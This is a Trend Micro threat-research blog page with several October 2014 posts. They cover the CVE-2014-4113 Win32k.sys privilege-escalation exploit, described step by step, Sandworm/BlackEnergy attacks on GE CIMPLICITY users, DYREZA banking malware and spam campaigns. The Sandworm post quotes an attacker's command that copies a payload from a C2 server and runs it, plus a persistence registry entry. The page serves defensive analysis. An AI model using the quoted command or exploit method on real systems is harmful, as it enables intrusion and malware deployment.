Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    October 2014
    S M T W T F S
    « Sep    
  • About Us

    Three zero-day vulnerabilities - CVE-2014-4114, CVE-2014-4148, and CVE-2014-4113 - were reported last week and patched by Microsoft in their October 2014 Patch Tuesday. CVE-2014-4114, also known as the Sandworm vulnerability, can enable attackers to easily craft malware payloads when exploited.

    This particular vulnerability has been linked to targeted attacks against European sectors and industries. In addition, our researchers found that Sandworm was also being used to target hit SCADA systems.

    The latter two vulnerabilities (CVE-2014-4148, CVE-2014-4113) leveraged vulnerabilities in the Windows kernel (Win32k.sys), affecting most Windows versions. In 2013, only one Windows kernel zero-day, was made public; this particular vulnerability only affected some versions of Windows XP and Windows 2003. These new zero-days could be a sign that attackers are possibly shifting their focus back to kernel vulnerabilities.

    CVE-2014-4113 allows for the elevation of privileges when exploited successfully. Microsoft addressed this in MS14-058. The vulnerability affects both desktop and server versions from Windows XP and Server 2003 up to Windows 8.1 and Server 2012 R2. However, the currently available exploit code does not affect Windows 8 and later versions.

    With a parameter in the command line, the exploit code can create new processes with System privileges of an assigned program. EoP exploits are also believed to be used in targeted attacks, since the exploitable application does not have the privileges needed by attackers. This was seen in Stuxnet which employed CVE-2010-2743 (also in Win32k.sys) to EoP after using other exploit to infect system.

    The analysis of this vulnerability and its exploit will be based on samples with the following MD5 hashes:

    • 70857e02d60c66e27a173f8f292774f1
    • f9f01ce747679b82723b989d01c4d927

    We detect these as TROJ_APOLMY.A and TROJ64_APOLMY.A, with the latter being the version found on 64-bit systems.

    Everything you need to know about the Win32k.sys vulnerability

    Win32k.sys is responsible for window management, and any GUI process/thread that will use it. Its related user-mode modules are user32.dll and GDI32.dll. Due to the complex interaction with user-mode applications, there are many problems in Win32k.sys.

    Let’s take a closer look on the vulnerability being exploited. The essential problem is the function return value is not validated correctly. Programmers tend to overlook this, but doing otherwise is a serious security risk.

    In Win32k.sys, there is a function called xxxMNFindWindowFromPoint(), which returns the address of win32k!tagWND structure or error code -1, -5. Another function xxxHandleMenuMessages() will call it and use its return value as parameter of xxxSendMessage(). Below is the pseudo code:



    tagWnd* pWnd = xxxMNFindWindowFromPoint(…);
    …   //without checking if the return value is a valid address


    Obviously, if the error code -1 or -5 is used in xxxSendMessage() as an address, it will result in an error, such as a blue screen. In user-mode code, this is currently not exploitable. We will  see how the sample exploits this vulnerability in kernel-mode in the next section.

    Below are the key steps or description on how the exploit occurs:

    • Map a prepared memory section to NULL page, which includes a fake win32k!tagWND structure and a pointer to shell code for EoP in that structure.
    • Trigger the bug and make the return value (pWnd) of xxxMNFindWindowFromPoint() to be -5 (0xfffffffb). Because all to-be-checked fields in the fake structure are accessible and in proper values, xxxSendMessage() will treat -5 as a valid address. It will then call a function pointer in the structure, which is the pointer to the shell code.
    • Replace the token in EPROCESS to elevate to SYSTEM privileges in shell code.
    • Create a child process with SYSTEM privileges of the assigned program

    The sample uses SetWindowsHookEx() to control xxxMNFindWindowFromPoint() to return -5:

    1. Create a window and 2-level popup menu.
    2.  Hook that window’s wndproc call.
    3. Track popup menu on the window and enter hook callback.
    4. In the hook callback, it changes wndproc of the menu to another callback.
    5.  In menu’s callback, it will destroy the menu and return -5 (PUSH 0xfffffffb; POP EAX)
    6. Lead to xxxMNFindWindowFromPoint() on the destroyed menu return -5

    Furthermore, the shell code of the sample is simple and direct, as can be seen from the snippet below. We can see that it gets EPROCESS of SYSTEM process (PID=4), and copies its privilege token to EPROCESS of current process.


    Figure 1. Code snippet of the sample

    From the analysis, we can see that it is easier to exploit these kernel vulnerabilities than to exploit vulnerabilities like Internet Explorer UAF vulnerabilities. Some effective protections in user-mode, like DEP, is easily bypassed in kernel-mode exploits. This is because a program, instead of entered data or script, is used to exploit the bug. Such code is by its nature already executable.

    With more application sandboxing adopted in the OS, kernel vulnerabilities will be more important for privilege elevation. Though this exploitation method is not new anymore, it will be noticed by attackers, especially now that CVE-2014-4113 is public.

    During our sample sourcing, we even saw that the source code of an exploit creation tool was exposed. It is expected that more exploits variants will be created by attackers. We believe that threat actors and attackers need kernel vulnerability to carry out EoP attacks and break application sandboxing. Once information about these exploitation methods become more prevalent, we may see more similar kernel zero-day vulnerabilities in the future.

    Windows 7 and Windows XP are the versions of Windows most at risk of this attack. Enterprises are heavy users of both versions, and may be affected by this threat. We highly recommend that users and system administrators apply the relevant patches and keep their systems up-to-date.

    Windows 8 and later versions are at less risk, as the currently available exploit code is blocked on these versions. This is because of a new security feature known as Supervisor Mode Execution Prevention (SMEP), which prevents the access (read/write/execute) of user-mode memory pages in kernel-mode.  As such, the access to null page and shell code will not lead to code execution, although it will lead to crashes.

    Trend Micro is continuously monitoring the threat landscape for any developments regarding these vulnerabilities including Sandworm. For more information on them, you may read our other articles:

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    On October 14th, a report was publicly released regarding the Sandworm team.  After beginning an investigation into the affiliated malware samples and domains, we quickly came to realization that this group is very likely targeting SCADA-centric victims who are using GE Intelligent Platform’s CIMPLICITY HMI solution suite.   We have observed this team utilizing .cim and .bcl files as attack vectors, both of which file types are used by the CIMPLICITY software.  As further proof of the malware targeting CIMPILICITY, it drops files into the CIMPLICITY installation directory using the %CIMPATH% environment variable on the victim machines.

    Figure 1. Strings showing environment variable

    CIMPLICITY is an application suite that is used in conjunction with SCADA systems.  A key component of any SCADA system is the HMI. The HMI (which stands for Human-Machine interface) can be viewed as an operator console that is used to monitor and control devices in an industrial environment. These devices can be responsible for automation control as well as safety operations.

    Figure 2 below shows an example of where HMIs can be found in an electric power delivery system. Additionally, you may find HMIs in the corporate network that are being used for design, development, and testing.

    Figure 2. Sample SCADA System

    It is important to note that we are currently seeing CIMPLICITY being used as an attack vector; however, we have found no indication that this malware is manipulating any actual SCADA systems or data. Since HMIs are located in both the corporate and control networks, this attack could be used to target either network segment, or used to cross from the corporate to the control network.

    What Drew Our Attention?

    When looking closer at the recent Sandworm Team report, we started to pivot off several of the C2’s that were identified in the report. Again, we aren’t aware of any attacks against SCADA devices directly utilizing anything that we discuss below.

    One of the C2’s that drew our immediate attention was 94[.]185[.]85[.]122. We pivoted off this C2, and located a file called config.bak (SHA1 hash: c931be9cd2c0bd896ebe98c9304fea9e). This file piqued our interest right off the bat, because it is a CimEdit/CimView file. A CimEdit/CimView file is an object oriented file for GE’s Cimplicity SCADA software suite, used to administer SCADA devices.

    Figure 3. CimView/CimEdit Example

    In config.bak, there are two events that are defined: OnOpenExecCommand and ScreenOpenDispatch.

    The handler of OnOpenExecCommand is the following command line:

    cmd.exe /c "copy \\94[.]185[.]85[.]122\public\default.txt "%CIMPATH%\CimCMSafegs.exe" && start "WOW64" "%CIMPATH%\CimCMSafegs.exe"

    It’s important to note the variable %CIMPATH% is used for the drop location of default.txt. This is a standard variable that Cimplicity uses for its installs. The handler of ScreenOpenDispatch is the subroutine start(). The subroutine start() downloads the file from hxxp://94[.]185[.]85[.]122/newsfeed.xml, saves and executes the downloaded file using cscript.exe, deletes the file after execution, and terminates the current process.

    We currently do not have a sample of newsfeed.xml or {random 41 character hex string}.wsf that can be analyzed for further detail. This event mechanism does not seem to exploit vulnerabilities; it’s comparable to AutoOpen and AutoExec in Microsoft Office.

    In addition to config.bak being a CimEdit/CimView file, there is a reference to devlist.cim (MD5: 59e41a4cdf2a7d37ac343d0293c616b7), which is a Cimpack Design Drawing File.

    The default.txt file copied from the C2 in the above command structure drops and executes %Startup%\flashplayerapp.exe, then deletes itself after execution. Flashplayerapp.exe is capable of issuing the following commands:

    • exec
    • lexec
    • die
    • getup
    • turnoff
    • chprt

    In addition to config.bak and default.txt being of interest, another file – shell.bcl (MD5: bdc7fafc26bee0e5e75b521a89b2746d) drew our attention. It is a script designed to run in the Basic Control Engine; .bcl files are used heavily throughout SCADA systems to automate certain functions. In Cimplicity, .bcl files are used for creating scripts to help automate functions. Shell.bcl executes 94[.1[85[.]85[.]122\public\xv.exe directly.

    Based on the strings in shell.bcl, xv.exe is supposed to exploit the system vulnerability. We don’t currently have a copy or hash for xv.exe or Flashplayerapp.exe available to confirm this assumption.

    Open Directories

    During the course of regular threat intelligence gathering, we often look closely at the C2 server that attackers are using to communicate and drop/upload files to and from victim machines.

    In the case of 94[.]185[.]85[.]122, in addition to config.bak, we were able to pull down additional malware files that the particular actors were using from the C2. A few of the notable files found on the C2 can be found below. These files may or may not have been used in conjunction with attacks involving SCADA devices.

    Spiskideputatovdone.ppsx (MD5: 330e8d23ab82e8a0ca6d166755408eb1), which means deputy list in Russian, has been tied to an email address based on VirusTotal submissions. This file is a PPSX file that downloads/loads  94[.]185[.]85[.]122\public\slide1.gif and 94[.]185[.]85[.]122\public\slides.inf (MD5: 8313034e9ab391df83f6a4f242ec5f8d). The downloaded file slide.inf renames the local file slide1.gif to slide1.gif.exe and adds the registry entry HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce Install=”{dir}\slide1.gif.exe”. Oleh Tiahnybok is a Ukrainian politician with outspoken anti-Russian views.

    Slide1.gif.exe (MD5: 8a7c30a7a105bd62ee71214d268865e3) drops FONTCACHE.DAT  (MD5: 2f6582797bbc34e4df47ac25e363571d) and deletes itself after execution. FONTCACHE.DAT is a version of the Black Energy bot capable of executing the following commands on the system:

    • delete
    • ldplg
    • unlplg
    • update
    • dexec
    • exec
    • updcfg


    As we have seen, these are pieces of a very complex targeted attack that is seemingly focused on GE Intelligent Platform CIMPLICITY users.  We have, at present, found no indications that this malware is actually manipulating physical SCADA systems or their resultant data.

    As we continue the investigation into this targeted attack, be sure to check back as we will keep you up to date on our findings. All of the samples listed in this blog are currently caught by Trend Micro under the name BKDR_BLACKEN.A and BKDR_BLACKEN.B.

    Special thanks to the entire Forward-Looking Threat Research Team, Christopher Daniel So, Mark Joseph Manahan and the Ottawa Deep Security Labs

    Update as of October 17, 2014, 12:35 A.M.

    An earlier version of this post included several incorrect hashes. These have now been corrected.

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    Cybercriminals and threat actors often use tried-and-tested vulnerabilities in order to infect user systems and consequently, penetrate an enterprise network. This highlights the importance of patching systems and keeping software and applications up-to-date.

    We recently spotted DYREZA malware leveraging an old vulnerability found existing in Adobe Reader and Acrobat and covered under CVE-2013-2729. Accordingly, once this vulnerability is successfully exploited it could lead to the execution of arbitrary code on the affected system.



    Figures 1-2. Screenshots of spam emails

    DYREZA malware uses spammed message that purports to be an invoice notification as its infection vector. It has a malicious .PDF file attachment, detected by Trend Micro as TROJ_PIDIEF.YYJU. When executed, it exploits the CVE-2013-2729 vulnerability, which leads to the download of TSPY_DYRE.EKW, a variant of DYREZA (also known as DYRE and DYRANGES).

    DYREZA is a malware known for stealing banking credentials and associated with parcel mule scams. We recently wrote a blog post detailing the role that this malware plays in the threat landscape ecosystem and some of its notable behavior, including its capability to perform man-in-the-middle (MITM) attacks via browser injections, monitoring online banking sessions of targeted banks, and stealing other information such as browser versions, snapshots, and personal certificates.

    Users and enterprises are at risk since DYREZA can get other types of data such as personal identifiable information (PII) and credentials via browser snapshots. Aside from this, we also reported that the CUTWAIL botnet leads to the download of both UPATRE and DYRE malware.

    What makes TSPY_DYRE.EKW notable is its ability to steal crucial information via injecting malicious codes onto certain banking and bitcoin login webpages.  Some of the bitcoin pages it monitors are:


    Apart from its information stealing routines, TSPY_DYRE.EKW has the capability to connect to certain malicious websites to send and receive information. Moreover, it can connect to specific STUN (Session Traversal Utilities for NAT) servers to determine the public IP address of the compromised computer. As such, cybercriminals can find out the location of the malware or possibly determine the affected users’ and organizations’ locations. The top country victims are Ireland, United States, Canada, Great Britain, and Netherlands.

    Bitcoin is a digital currency that has real world value. Cybercriminals often go after bitcoins since it presents a new venue for them to generate profit. While this is not the first instance that scammers and cybercriminals target bitcoins, this new attack highlights how traditional threats like exploits and banking malware remain to be a relevant means for cybercriminals to steal both user credentials and hit a relatively new platform – bitcoins.  It also teaches us an important lesson about keeping systems and software applications updated to its latest version.

    Trend Micro protects users from this threat via its Smart Protection Network that detects the spammed message and all related malware.

    With additional analysis from Rhena Inocencio, Karla Agregada, and Michael Casayuran

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    A new spam attack disguised as invoice message notifications was recently seen spreading the UPATRE malware, that ultimately downloads its final  payload- a BANKER malware related to the DYREZA/DYRE banking malware.


    In early October we observed a surge of spammed messages sent by the botnet CUTWAIL/PUSHDO, totaling to more than 18,000 messages seen in a single day. CUTWAIL/PUSHDO has been in the wild since as early as 2007 and was considered one of the biggest spam botnets in 2009.

    We spotted some spammed emails that disguise itself as invoice message notifications or “new alert messages” from various companies and institutions.

    Figure 1. Screenshots of spammed messages related to CUTWAIL/PUSHDO


    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    The Domain Name System (DNS) plays a vital role in the operation of the Internet. Over the years, it has been a primary target for malicious users looking for vulnerabilities in its protocol and infrastructure.
    Some examples include cache poisoning attacks, vulnerable DNS server implementations, and bogus user interactions.

    Taking advantage of users’ spelling mistakes

    Misspelled domain names in the browser’s address bar are a common user mistake, which attackers were quick to take advantage of. Attackers register the “squatting” or misspelled version of victim domains in order to capitalize on the potential incoming traffic. They eventually use these domains for a wide range of unethical and illegal ways, which may include exfiltration of user credentials through phishing. (more…)

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice